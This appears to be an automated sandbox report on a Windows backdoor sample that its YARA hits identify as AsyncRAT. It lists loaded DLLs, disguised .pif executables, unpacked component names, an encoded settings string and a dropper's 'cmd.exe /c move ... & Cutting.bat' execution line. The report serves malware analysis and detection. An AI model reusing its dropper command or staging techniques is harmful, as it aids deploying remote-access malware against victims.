Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wldp.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll

Uses 32bit PE files

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'

Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@46/20@1/1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004B41FA GetLastError,FormatMessageW,

11_2_004B41FA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_0040350A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004A2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	11_2_004A2010
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004A1A0B AdjustTokenPrivileges,CloseHandle,	11_2_004A1A0B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Code function: 0_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404967

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004ADD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

11_2_004ADD87

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004B3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

11_2_004B3A0E

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Commander

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3628:120:WilError_03
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_03
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\0vyG14tDobaS6ejo

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File created: C:\Users\user~1\AppData\Local\Temp\nskE4D4.tmp

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File read: C:\Users\desktop.ini

Jump to behavior

